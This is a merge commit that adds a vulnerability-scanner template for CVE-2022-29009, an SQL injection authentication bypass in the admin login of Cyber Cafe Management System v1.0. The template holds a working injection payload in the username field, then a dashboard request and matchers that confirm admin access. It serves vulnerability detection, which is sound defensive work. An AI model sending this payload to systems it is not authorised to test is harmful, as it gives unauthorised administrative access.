Merge pull request #5284 from TenBird-1/CREATE-CVE-2022-29009

CREATE CVE-2022-29009

cves/2022/CVE-2022-29009.yaml

@@ -0,0 +1,44 @@
+id: CVE-2022-29009
+
+info:
+  name: Cyber Cafe Management System Project v1.0 - SQLi Authentication Bypass
+  author: TenBird
+  severity: critical
+  description: |
+    Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50355
+    - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29009
+  classification:
+    cve-id: CVE-2022-29009
+  metadata:
+    verified: true
+  tags: cve,cve2022,sqli,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /ccms/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username=%27+Or+1--+-&password=1&login=
+
+      - |
+        GET /ccms/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'CCMS Admin Dashboard'
+          - 'CCMS ADMIN | Admin'
+        condition: and
+
+      - type: status
+        status:
+          - 200